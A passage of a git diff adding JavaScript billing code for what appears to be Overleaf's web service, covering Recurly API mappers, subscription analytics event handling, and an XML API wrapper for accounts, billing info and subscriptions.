given add-on + * + * @param {string} planCode + * @param {string} addOnCode + * @return {Promise<PaymentProviderAddOn>} + */ +async function getAddOn(planCode, addOnCode) { + const addOn = await client.getPlanAddOn( + `code-${planCode}`, + `code-${addOnCode}` + ) + return addOnFromApi(addOn) +} + +/** + * Get the configuration for a given plan + * + * @param {string} planCode + * @return {Promise<PaymentProviderPlan>} + */ +async function getPlan(planCode) { + const plan = await client.getPlan(`code-${planCode}`) + return planFromApi(plan) +} + +function subscriptionIsCanceledOrExpired(subscription) { + const state = subscription?.recurlyStatus?.state + return state === 'canceled' || state === 'expired' +} + +/** + * Build a PaymentProviderAccount from Recurly API data + * + * @param {recurly.Account} apiAccount + * @return {PaymentProviderAccount} + */ +function accountFromApi(apiAccount) { + if (apiAccount.code == null || apiAccount.email == null) { + throw new OError('Invalid Recurly account', { + account: apiAccount, + }) + } + return new PaymentProviderAccount({ + code: apiAccount.code, + email: apiAccount.email, + hasPastDueInvoice: apiAccount.hasPastDueInvoice ?? false, + }) +} + +/** + * Build a PaymentProviderCoupon from Recurly API data + * + * @param {recurly.CouponRedemption} apiRedemption + * @return {PaymentProviderCoupon} + */ +function couponFromApi(apiRedemption) { + if (apiRedemption.coupon == null || apiRedemption.coupon.code == null) { + throw new OError('Invalid Recurly coupon', { + coupon: apiRedemption, + }) + } + return new PaymentProviderCoupon({ + code: apiRedemption.coupon.code, + name: apiRedemption.coupon.name ?? '', + description: apiRedemption.coupon.hostedPageDescription ?? '', + }) +} + +/** + * Build a PaymentProviderSubscription from Recurly API data + * + * @param {recurly.Subscription} apiSubscription + * @return {PaymentProviderSubscription} + */ +function subscriptionFromApi(apiSubscription) { + if ( + apiSubscription.uuid == null || + apiSubscription.plan == null || + apiSubscription.plan.code == null || + apiSubscription.plan.name == null || + apiSubscription.account == null || + apiSubscription.account.code == null || + apiSubscription.unitAmount == null || + apiSubscription.subtotal == null || + apiSubscription.total == null || + apiSubscription.currency == null || + apiSubscription.currentPeriodStartedAt == null || + apiSubscription.currentPeriodEndsAt == null || + apiSubscription.collectionMethod == null + ) { + throw new OError('Invalid Recurly subscription', { + subscription: apiSubscription, + }) + } + + const subscription = new PaymentProviderSubscription({ + id: apiSubscription.uuid, + userId: apiSubscription.account.code, + planCode: apiSubscription.plan.code, + planName: apiSubscription.plan.name, + planPrice: apiSubscription.unitAmount, + addOns: (apiSubscription.addOns ?? []).map(subscriptionAddOnFromApi), + subtotal: apiSubscription.subtotal, + taxRate: apiSubscription.taxInfo?.rate ?? 0, + taxAmount: apiSubscription.tax ?? 0, + total: apiSubscription.total, + currency: apiSubscription.currency, + periodStart: apiSubscription.currentPeriodStartedAt, + periodEnd: apiSubscription.currentPeriodEndsAt, + collectionMethod: apiSubscription.collectionMethod, + service: 'recurly', + state: apiSubscription.state ?? 'active', + trialPeriodEnd: apiSubscription.trialEndsAt, + pausePeriodStart: apiSubscription.pausedAt, + remainingPauseCycles: apiSubscription.remainingPauseCycles, + }) + + if (apiSubscription.pendingChange != null) { + subscription.pendingChange = subscriptionChangeFromApi( + subscription, + apiSubscription.pendingChange + ) + } + + return subscription +} + +/** + * Build a PaymentProviderSubscriptionAddOn from Recurly API data + * + * @param {recurly.SubscriptionAddOn} addOn + * @return {PaymentProviderSubscriptionAddOn} + */ +function subscriptionAddOnFromApi(addOn) { + if ( + addOn.addOn == null || + addOn.addOn.code == null || + addOn.addOn.name == null || + addOn.unitAmount == null + ) { + throw new OError('Invalid Recurly add-on', { addOn }) + } + + return new PaymentProviderSubscriptionAddOn({ + code: addOn.addOn.code, + name: addOn.addOn.name, + quantity: addOn.quantity ?? 1, + unitPrice: addOn.unitAmount, + }) +} + +/** + * Build a PaymentProviderSubscriptionChange from Recurly API data + * + * @param {PaymentProviderSubscription} subscription - the current subscription + * @param {recurly.SubscriptionChange} subscriptionChange - the subscription change returned from the API + * @return {PaymentProviderSubscriptionChange} + */ +function subscriptionChangeFromApi(subscription, subscriptionChange) { + if ( + subscriptionChange.plan == null || + subscriptionChange.plan.code == null || + subscriptionChange.plan.name == null || + subscriptionChange.unitAmount == null + ) { + throw new OError('Invalid Recurly subscription change', { + subscriptionChange, + }) + } + const nextAddOns = (subscriptionChange.addOns ?? []).map( + subscriptionAddOnFromApi + ) + + return new PaymentProviderSubscriptionChange({ + subscription, + nextPlanCode: subscriptionChange.plan.code, + nextPlanName: subscriptionChange.plan.name, + nextPlanPrice: subscriptionChange.unitAmount, + nextAddOns, + immediateCharge: computeImmediateCharge(subscriptionChange), + }) +} + +/** + * Compute immediate charge based on invoice collection + * + * @param {recurly.SubscriptionChange} subscriptionChange - the subscription change returned from the API + * @return {PaymentProviderImmediateCharge} + */ +function computeImmediateCharge(subscriptionChange) { + const roundToTwoDecimal = (/** @type {number} */ num) => + Math.round(num * 100) / 100 + let subtotal = + subscriptionChange.invoiceCollection?.chargeInvoice?.subtotal ?? 0 + let tax = subscriptionChange.invoiceCollection?.chargeInvoice?.tax ?? 0 + let total = subscriptionChange.invoiceCollection?.chargeInvoice?.total ?? 0 + let discount = + subscriptionChange.invoiceCollection?.chargeInvoice?.discount ?? 0 + for (const creditInvoice of subscriptionChange.invoiceCollection + ?.creditInvoices ?? []) { + // The credit invoice numbers are already negative + subtotal = roundToTwoDecimal(subtotal + (creditInvoice.subtotal ?? 0)) + total = roundToTwoDecimal(total + (creditInvoice.total ?? 0)) + // Tax rate can be different in credit invoice if a user relocates + tax = roundToTwoDecimal(tax + (creditInvoice.tax ?? 0)) + discount = roundToTwoDecimal(discount + (creditInvoice.discount ?? 0)) + } + return new PaymentProviderImmediateCharge({ + subtotal, + total, + tax, + discount, + }) +} + +/** + * Returns a payment method from Recurly API data + * + * @param {recurly.BillingInfo} billingInfo + * @return {PaymentMethod} + */ +function paymentMethodFromApi(billingInfo) { + if (billingInfo.paymentMethod == null) { + throw new OError('Invalid Recurly billing info', { billingInfo }) + } + const paymentMethod = billingInfo.paymentMethod + + if (paymentMethod.billingAgreementId != null) { + return new PaypalPaymentMethod() + } + + if (paymentMethod.cardType == null || paymentMethod.lastFour == null) { + throw new OError('Invalid Recurly billing info', { billingInfo }) + } + return new CreditCardPaymentMethod({ + cardType: paymentMethod.cardType, + lastFour: paymentMethod.lastFour, + }) +} + +/** + * Build a PaymentProviderAddOn from Recurly API data + * + * @param {recurly.AddOn} addOn + * @return {PaymentProviderAddOn} + */ +function addOnFromApi(addOn) { + if (addOn.code == null || addOn.name == null) { + throw new OError('Invalid Recurly add-on', { addOn }) + } + return new PaymentProviderAddOn({ + code: addOn.code, + name: addOn.name, + }) +} + +/** + * Build a PaymentProviderPlan from Recurly API data + * + * @param {recurly.Plan} plan + * @return {PaymentProviderPlan} + */ +function planFromApi(plan) { + if (plan.code == null || plan.name == null) { + throw new OError('Invalid Recurly add-on', { plan }) + } + return new PaymentProviderPlan({ + code: plan.code, + name: plan.name, + }) +} + +/** + * Build an API request from a PaymentProviderSubscriptionChangeRequest + * + * @param {PaymentProviderSubscriptionChangeRequest} changeRequest + * @return {recurly.SubscriptionChangeCreate} + */ +function subscriptionChangeRequestToApi(changeRequest) { + /** @type {recurly.SubscriptionChangeCreate} */ + const requestBody = { + timeframe: changeRequest.timeframe, + } + if (changeRequest.planCode != null) { + requestBody.planCode = changeRequest.planCode + } + if (changeRequest.addOnUpdates != null) { + requestBody.addOns = changeRequest.addOnUpdates.map(addOnUpdate => { + /** @type {recurly.SubscriptionAddOnUpdate} */ + const update = { code: addOnUpdate.code } + if (addOnUpdate.quantity != null) { + update.quantity = addOnUpdate.quantity + } + if (addOnUpdate.unitPrice != null) { + update.unitAmount = addOnUpdate.unitPrice + } + return update + }) + } + return requestBody +} + +module.exports = { + errors: recurly.errors, + + getAccountForUserId: callbackify(getAccountForUserId), + createAccountForUserId: callbackify(createAccountForUserId), + getActiveCouponsForUserId: callbackify(getActiveCouponsForUserId), + getSubscription: callbackify(getSubscription), + getSubscriptionForUser: callbackify(getSubscriptionForUser), + previewSubscriptionChange: callbackify(previewSubscriptionChange), + applySubscriptionChangeRequest: callbackify(applySubscriptionChangeRequest), + removeSubscriptionChange: callbackify(removeSubscriptionChange), + removeSubscriptionChangeByUuid: callbackify(removeSubscriptionChangeByUuid), + reactivateSubscriptionByUuid: callbackify(reactivateSubscriptionByUuid), + cancelSubscriptionByUuid: callbackify(cancelSubscriptionByUuid), + getPaymentMethod: callbackify(getPaymentMethod), + getAddOn: callbackify(getAddOn), + getPlan: callbackify(getPlan), + subscriptionIsCanceledOrExpired, + pauseSubscriptionByUuid: callbackify(pauseSubscriptionByUuid), + resumeSubscriptionByUuid: callbackify(resumeSubscriptionByUuid), + + promises: { + getSubscription, + getSubscriptionForUser, + getAccountForUserId, + createAccountForUserId, + getActiveCouponsForUserId, + previewSubscriptionChange, + applySubscriptionChangeRequest, + removeSubscriptionChange, + removeSubscriptionChangeByUuid, + reactivateSubscriptionByUuid, + cancelSubscriptionByUuid, + pauseSubscriptionByUuid, + resumeSubscriptionByUuid, + getPaymentMethod, + getAddOn, + getPlan, + }, +} diff --git a/services/web/app/src/Features/Subscription/RecurlyEventHandler.js b/services/web/app/src/Features/Subscription/RecurlyEventHandler.js new file mode 100644 index 0000000..d97d57e --- /dev/null +++ b/services/web/app/src/Features/Subscription/RecurlyEventHandler.js @@ -0,0 +1,365 @@ +const SplitTestHandler = require('../SplitTests/SplitTestHandler') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const SubscriptionEmailHandler = require('./SubscriptionEmailHandler') +const { AI_ADD_ON_CODE } = require('./PaymentProviderEntities') +const { ObjectId } = require('mongodb-legacy') + +const INVOICE_SUBSCRIPTION_LIMIT = 10 + +async function sendRecurlyAnalyticsEvent(event, eventData) { + const userId = _getUserId(eventData) + if (!ObjectId.isValid(userId)) { + return + } + + switch (event) { + case 'new_subscription_notification': + await _sendSubscriptionStartedEvent(userId, eventData) + break + case 'updated_subscription_notification': + await _sendSubscriptionUpdatedEvent(userId, eventData) + break + case 'canceled_subscription_notification': + await _sendSubscriptionCancelledEvent(userId, eventData) + break + case 'expired_subscription_notification': + await _sendSubscriptionExpiredEvent(userId, eventData) + break + case 'renewed_subscription_notification': + await _sendSubscriptionRenewedEvent(userId, eventData) + break + case 'reactivated_account_notification': + await _sendSubscriptionReactivatedEvent(userId, eventData) + break + case 'subscription_paused_notification': + await _sendSubscriptionPausedEvent(userId, eventData) + break + case 'subscription_resumed_notification': + // 'resumed' here means resumed from pause + await _sendSubscriptionResumedEvent(userId, eventData) + break + case 'paid_charge_invoice_notification': + if ( + eventData.invoice.state === 'paid' && + eventData.invoice.total_in_cents > 0 + ) { + await _sendInvoicePaidEvent(userId, eventData) + } + break + case 'closed_invoice_notification': + if ( + eventData.invoice.state === 'collected' && + eventData.invoice.total_in_cents > 0 + ) { + await _sendInvoicePaidEvent(userId, eventData) + } + break + } +} + +async function _sendSubscriptionResumedEvent(userId, eventData) { + const { planCode, state, subscriptionId } = _getSubscriptionData(eventData) + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-resumed', + { + plan_code: planCode, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) +} + +async function _sendSubscriptionPausedEvent(userId, eventData) { + const { planCode, state, subscriptionId } = _getSubscriptionData(eventData) + + const pauseLength = eventData.subscription.remaining_pause_cycles + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-paused', + { + pause_length: pauseLength, + plan_code: planCode, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) +} + +async function _sendSubscriptionStartedEvent(userId, eventData) { + const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } = + _getSubscriptionData(eventData) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-started', + { + plan_code: planCode, + quantity, + is_trial: isTrial, + has_ai_add_on: hasAiAddOn, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-plan-code', + planCode + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-is-trial', + isTrial + ) + + if (isTrial) { + await SubscriptionEmailHandler.sendTrialOnboardingEmail(userId, planCode) + const cioAssignment = await SplitTestHandler.promises.getAssignmentForUser( + userId, + 'customer-io-trial-conversion' + ) + if (cioAssignment.variant === 'enabled') { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'customer-io-integration', + true + ) + } + } +} + +async function _sendSubscriptionUpdatedEvent(userId, eventData) { + const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } = + _getSubscriptionData(eventData) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-updated', + { + plan_code: planCode, + quantity, + is_trial: isTrial, + has_ai_add_on: hasAiAddOn, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-plan-code', + planCode + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-is-trial', + isTrial + ) +} + +async function _sendSubscriptionCancelledEvent(userId, eventData) { + const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } = + _getSubscriptionData(eventData) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-cancelled', + { + plan_code: planCode, + quantity, + is_trial: isTrial, + has_ai_add_on: hasAiAddOn, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-is-trial', + isTrial + ) +} + +async function _sendSubscriptionExpiredEvent(userId, eventData) { + const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } = + _getSubscriptionData(eventData) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-expired', + { + plan_code: planCode, + quantity, + is_trial: isTrial, + has_ai_add_on: hasAiAddOn, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-plan-code', + planCode + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-is-trial', + isTrial + ) +} + +async function _sendSubscriptionRenewedEvent(userId, eventData) { + const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } = + _getSubscriptionData(eventData) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-renewed', + { + plan_code: planCode, + quantity, + is_trial: isTrial, + has_ai_add_on: hasAiAddOn, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-plan-code', + planCode + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-is-trial', + isTrial + ) +} + +async function _sendSubscriptionReactivatedEvent(userId, eventData) { + const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } = + _getSubscriptionData(eventData) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-reactivated', + { + plan_code: planCode, + quantity, + has_ai_add_on: hasAiAddOn, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-plan-code', + planCode + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-is-trial', + isTrial + ) +} + +async function _sendInvoicePaidEvent(userId, eventData) { + const invoice = eventData.invoice + if (!invoice) { + return + } + const invoiceNumber = invoice.invoice_number + const currency = invoice.currency + const totalInCents = invoice.total_in_cents + const taxInCents = invoice.tax_in_cents + const country = invoice.address?.country + const collectionMethod = invoice.collection_method + const subscriptionIds = {} + invoice.subscription_ids?.forEach((e, idx) => { + if (idx < INVOICE_SUBSCRIPTION_LIMIT) { + subscriptionIds[`subscriptionId${idx + 1}`] = e + } + }) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-invoice-collected', + { + invoiceNumber, + currency, + totalInCents, + taxInCents, + country, + collectionMethod, + ...subscriptionIds, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-is-trial', + false + ) +} + +function _getUserId(eventData) { + let userId + if (eventData && eventData.account && eventData.account.account_code) { + userId = eventData.account.account_code + } else { + throw new Error( + 'account.account_code missing in event data to identity user ID' + ) + } + return userId +} + +function _getSubscriptionData(eventData) { + const isTrial = + eventData.subscription.trial_started_at && + eventData.subscription.current_period_started_at && + eventData.subscription.trial_started_at.getTime() === + eventData.subscription.current_period_started_at.getTime() + const hasAiAddOn = + eventData.subscription.subscription_add_ons?.some( + addOn => addOn.add_on_code === AI_ADD_ON_CODE + ) ?? false + return { + planCode: eventData.subscription.plan.plan_code, + quantity: eventData.subscription.quantity, + state: eventData.subscription.state, + subscriptionId: eventData.subscription.uuid, + isTrial, + hasAiAddOn, + } +} + +module.exports = { + sendRecurlyAnalyticsEvent, +} diff --git a/services/web/app/src/Features/Subscription/RecurlyWrapper.js b/services/web/app/src/Features/Subscription/RecurlyWrapper.js new file mode 100644 index 0000000..2227597 --- /dev/null +++ b/services/web/app/src/Features/Subscription/RecurlyWrapper.js @@ -0,0 +1,968 @@ +const OError = require('@overleaf/o-error') +const { + fetchStringWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const Settings = require('@overleaf/settings') +const xml2js = require('xml2js') +const logger = require('@overleaf/logger') +const Errors = require('../Errors/Errors') +const SubscriptionErrors = require('./Errors') +const { callbackify } = require('@overleaf/promise-utils') + +/** + * @param accountId + * @param newEmail + */ +async function updateAccountEmailAddress(accountId, newEmail) { + const data = { + email: newEmail, + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('account', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { accountId, newEmail }) + } + + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}`, + method: 'PUT', + body: requestBody, + }) + return await RecurlyWrapper.promises._parseAccountXml(body) +} + +const promises = { + _paypal: { + async checkAccountExists(cache) { + const { user } = cache + logger.debug( + { userId: user._id }, + 'checking if recurly account exists for user' + ) + let response, body + try { + ;({ response, body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${user._id}`, + method: 'GET', + expect404: true, + })) + } catch (error) { + OError.tag( + error, + 'error response from recurly while checking account', + { + user_id: user._id, + } + ) + throw error + } + if (response.status === 404) { + // actually not an error in this case, just no existing account + logger.debug( + { userId: user._id }, + 'user does not currently exist in recurly, proceed' + ) + cache.userExists = false + return cache + } + logger.debug({ userId: user._id }, 'user appears to exist in recurly') + try { + const account = await RecurlyWrapper.promises._parseAccountXml(body) + cache.userExists = true + cache.account = account + return cache + } catch (err) { + OError.tag(err, 'error parsing account', { + user_id: user._id, + }) + throw err + } + }, + async createAccount(cache) { + const { user } = cache + const { subscriptionDetails } = cache + if (cache.userExists) { + return cache + } + + const address = getAddressFromSubscriptionDetails( + subscriptionDetails, + false + ) + + const data = { + account_code: user._id, + email: user.email, + first_name: user.first_name, + last_name: user.last_name, + address, + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('account', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { user_id: user._id }) + } + + let body + try { + ;({ body } = await RecurlyWrapper.promises.apiRequest({ + url: 'accounts', + method: 'POST', + body: requestBody, + })) + } catch (error) { + OError.tag( + error, + 'error response from recurly while creating account', + { user_id: user._id } + ) + throw error + } + try { + cache.account = await RecurlyWrapper.promises._parseAccountXml(body) + return cache + } catch (err) { + OError.tag(err, 'error creating account', { + user_id: user._id, + }) + throw err + } + }, + async createBillingInfo(cache) { + const { user } = cache + const { recurlyTokenIds } = cache + logger.debug({ userId: user._id }, 'creating billing info in recurly') + const accountCode = cache?.account?.account_code + if (!accountCode) { + throw new Error('no account code at createBillingInfo stage') + } + const data = { token_id: recurlyTokenIds.billing } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('billing_info', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { user_id: user._id }) + } + let body + try { + ;({ body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountCode}/billing_info`, + method: 'POST', + body: requestBody, + })) + } catch (error) { + OError.tag( + error, + 'error response from recurly while creating billing info', + { user_id: user._id } + ) + throw error + } + try { + cache.billingInfo = + await RecurlyWrapper.promises._parseBillingInfoXml(body) + return cache + } catch (err) { + OError.tag(err, 'error creating billing info', { + user_id: user._id, + accountCode, + }) + throw err + } + }, + + async setAddressAndCompanyBillingInfo(cache) { + const { user } = cache + const { subscriptionDetails } = cache + logger.debug( + { userId: user._id }, + 'setting billing address and company info in recurly' + ) + const accountCode = cache?.account?.account_code + if (!accountCode) { + throw new Error( + 'no account code at setAddressAndCompanyBillingInfo stage' + ) + } + + const addressAndCompanyBillingInfo = getAddressFromSubscriptionDetails( + subscriptionDetails, + true + ) + + let requestBody + try { + requestBody = RecurlyWrapper._buildXml( + 'billing_info', + addressAndCompanyBillingInfo + ) + } catch (error) { + throw OError.tag(error, 'error building xml', { user_id: user._id }) + } + + let body + try { + ;({ body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountCode}/billing_info`, + method: 'PUT', + body: requestBody, + })) + } catch (error) { + OError.tag(error, 'error response from recurly while setting address', { + user_id: user._id, + }) + throw error + } + try { + cache.billingInfo = + await RecurlyWrapper.promises._parseBillingInfoXml(body) + return cache + } catch (err) { + if (err) { + OError.tag(err, 'error updating billing info', { + user_id: user._id, + }) + throw err + } + } + }, + async createSubscription(cache) { + const { user } = cache + const { subscriptionDetails } = cache + logger.debug({ userId: user._id }, 'creating subscription in recurly') + const data = { + plan_code: subscriptionDetails.plan_code, + currency: subscriptionDetails.currencyCode, + coupon_code: subscriptionDetails.coupon_code, + account: { + account_code: user._id, + }, + } + if (subscriptionDetails.subscription_add_ons) { + data.subscription_add_ons = subscriptionDetails.subscription_add_ons + } + const customFields = + getCustomFieldsFromSubscriptionDetails(subscriptionDetails) + if (customFields) { + data.custom_fields = customFields + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('subscription', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { user_id: user._id }) + } + + let body + try { + ;({ body } = await RecurlyWrapper.promises.apiRequest({ + url: 'subscriptions', + method: 'POST', + body: requestBody, + })) + } catch (error) { + OError.tag( + error, + 'error response from recurly while creating subscription', + { user_id: user._id } + ) + throw error + } + try { + cache.subscription = + await RecurlyWrapper.promises._parseSubscriptionXml(body) + return cache + } catch (err) { + OError.tag(err, 'error creating subscription', { + user_id: user._id, + }) + throw err + } + }, + }, + + async _createPaypalSubscription(user, subscriptionDetails, recurlyTokenIds) { + logger.debug( + { userId: user._id }, + 'starting process of creating paypal subscription' + ) + // We use waterfall through each of these actions in sequence + // passing a `cache` object along the way. The cache is initialized + // with required data, and `async.apply` to pass the cache to the first function + const cache = { user, recurlyTokenIds, subscriptionDetails } + let result + try { + result = await RecurlyWrapper.promises._paypal.checkAccountExists(cache) + result = await RecurlyWrapper.promises._paypal.createAccount(result) + result = await RecurlyWrapper.promises._paypal.createBillingInfo(result) + result = + await RecurlyWrapper.promises._paypal.setAddressAndCompanyBillingInfo( + result + ) + result = await RecurlyWrapper.promises._paypal.createSubscription(result) + } catch (err) { + OError.tag(err, 'error in paypal subscription creation process', { + user_id: user._id, + }) + throw err + } + if (!result.subscription) { + const err = new Error('no subscription object in result') + OError.tag(err, 'error in paypal subscription creation process', { + user_id: user._id, + }) + throw err + } + logger.debug( + { userId: user._id }, + 'done creating paypal subscription for user' + ) + return result.subscription + }, + + async _createCreditCardSubscription( + user, + subscriptionDetails, + recurlyTokenIds + ) { + const data = { + plan_code: subscriptionDetails.plan_code, + currency: subscriptionDetails.currencyCode, + coupon_code: subscriptionDetails.coupon_code, + account: { + account_code: user._id, + email: user.email, + first_name: subscriptionDetails.first_name || user.first_name, + last_name: subscriptionDetails.last_name || user.last_name, + billing_info: { + token_id: recurlyTokenIds.billing, + }, + }, + } + if (recurlyTokenIds.threeDSecureActionResult) { + data.account.billing_info.three_d_secure_action_result_token_id = + recurlyTokenIds.threeDSecureActionResult + } + if (subscriptionDetails.subscription_add_ons) { + data.subscription_add_ons = subscriptionDetails.subscription_add_ons + } + + const customFields = + getCustomFieldsFromSubscriptionDetails(subscriptionDetails) + if (customFields) { + data.custom_fields = customFields + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('subscription', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { user_id: user._id }) + } + + const { response, body } = await RecurlyWrapper.promises.apiRequest({ + url: 'subscriptions', + method: 'POST', + body: requestBody, + expect422: true, + }) + + if (response.status === 422) { + return await RecurlyWrapper.promises._handle422Response(body) + } else { + return await RecurlyWrapper.promises._parseSubscriptionXml(body) + } + }, + + async createSubscription(user, subscriptionDetails, recurlyTokenIds) { + const { isPaypal } = subscriptionDetails + logger.debug( + { userId: user._id, isPaypal }, + 'setting up subscription in recurly' + ) + const fn = isPaypal + ? RecurlyWrapper.promises._createPaypalSubscription + : RecurlyWrapper.promises._createCreditCardSubscription + return fn(user, subscriptionDetails, recurlyTokenIds) + }, + + /** + * @param options - the options to pass to the request library + * @returns {Promise<{ response: unknown, body: string}>} + */ + async apiRequest({ expect404, expect422, url, qs, ...fetchOptions }) { + const fetchUrl = new URL(RecurlyWrapper.apiUrl) + fetchUrl.pathname = + fetchUrl.pathname !== '/' ? `${fetchUrl.pathname}/${url}` : url + + if (qs) { + for (const [key, value] of Object.entries(qs)) { + fetchUrl.searchParams.set(key, value) + } + } + fetchOptions.headers = { + Authorization: `Basic ${Buffer.from( + Settings.apis.recurly.apiKey + ).toString('base64')}`, + Accept: 'application/xml', + 'Content-Type': 'application/xml; charset=utf-8', + 'X-Api-Version': Settings.apis.recurly.apiVersion, + } + + try { + return await fetchStringWithResponse(fetchUrl, fetchOptions) + } catch (error) { + if (error instanceof RequestFailedError) { + if (error.response.status === 404 && expect404) { + return { response: error.response, body: null } + } else if (error.response.status === 422 && expect422) { + return { response: error.response, body: error.body } + } + + if (fetchOptions.headers.Authorization) { + fetchOptions.headers.Authorization = 'REDACTED' + } + logger.warn( + { + err: error, + body: error.body, + options: fetchOptions, + url: fetchUrl.href, + statusCode: error.response?.status, + }, + 'error returned from recurly' + ) + throw new OError( + `Recurly API returned with status code: ${error.response.status}`, + { statusCode: error.response.status } + ) + } else { + throw error + } + } + }, + + async getSubscriptions(accountId) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}/subscriptions`, + }) + return await RecurlyWrapper.promises._parseXml(body) + }, + + async getSubscription(subscriptionId, options) { + let url + if (!options) { + options = {} + } + + if (options.recurlyJsResult) { + url = `recurly_js/result/${subscriptionId}` + } else { + url = `subscriptions/${subscriptionId}` + } + + const { body } = await RecurlyWrapper.promises.apiRequest({ + url, + }) + + const recurlySubscription = + await RecurlyWrapper.promises._parseSubscriptionXml(body) + + if (options.includeAccount) { + let accountId + if (recurlySubscription.account && recurlySubscription.account.url) { + accountId = recurlySubscription.account.url.match(/accounts\/(.*)/)[1] + } else { + throw new Error("I don't understand the response from Recurly") + } + + recurlySubscription.account = + await RecurlyWrapper.promises.getAccount(accountId) + + return recurlySubscription + } else { + return recurlySubscription + } + }, + + /** + * @typedef {{getNextPage: () => Promise<PageData>, items: any[]}} PageData + */ + + async getPaginatedEndpoint(resource, queryParams) { + let allItems = [] + let items + + /** @type {() => Promise<PageData>} */ + let getNextPage = promises.getPaginatedEndpointIterator( + resource, + queryParams + ) + while (getNextPage) { + ;({ items, getNextPage } = await getNextPage()) + allItems = allItems.concat(items) + logger.debug(`total now ${allItems.length}`) + } + return allItems + }, + + /** + * @returns {() => Promise<PageData>} + */ + getPaginatedEndpointIterator(resource, queryParams) { + queryParams.per_page = queryParams.per_page || 200 + const getPage = async (cursor = null) => { + const opts = { + url: resource, + qs: queryParams, + } + if (cursor) { + opts.qs.cursor = cursor + } + const { response, body } = await RecurlyWrapper.promises.apiRequest(opts) + + const data = await RecurlyWrapper.promises._parseXml(body) + + const items = data[resource] + logger.debug(`got ${items.length} items in this page`) + const match = response.headers.link?.match(/cursor=([0-9.]+%3A[0-9.]+)&/) + const nextCursor = match && match[1] + return { + items, + getNextPage: + nextCursor && (() => getPage(decodeURIComponent(nextCursor))), + } + } + return getPage + }, + + async getAccount(accountId) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}`, + }) + return await RecurlyWrapper.promises._parseAccountXml(body) + }, + + updateAccountEmailAddress, + + async getCoupon(couponCode) { + const opts = { url: `coupons/${couponCode}` } + const { body } = await RecurlyWrapper.promises.apiRequest(opts) + return await RecurlyWrapper.promises._parseCouponXml(body) + }, + + async getBillingInfo(accountId) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}/billing_info`, + }) + return await RecurlyWrapper.promises._parseXml(body) + }, + + async getAccountPastDueInvoices(accountId) { + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}/invoices`, + qs: { state: 'past_due' }, + }) + return await RecurlyWrapper.promises._parseInvoicesXml(body) + }, + + async attemptInvoiceCollection(invoiceId) { + return await RecurlyWrapper.promises.apiRequest({ + url: `invoices/${invoiceId}/collect`, + method: 'PUT', + }) + }, + + async updateSubscription(subscriptionId, options) { + logger.debug( + { subscriptionId, options }, + 'telling recurly to update subscription' + ) + const data = { + plan_code: options.plan_code, + timeframe: options.timeframe, + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('subscription', data) + } catch (error) { + throw 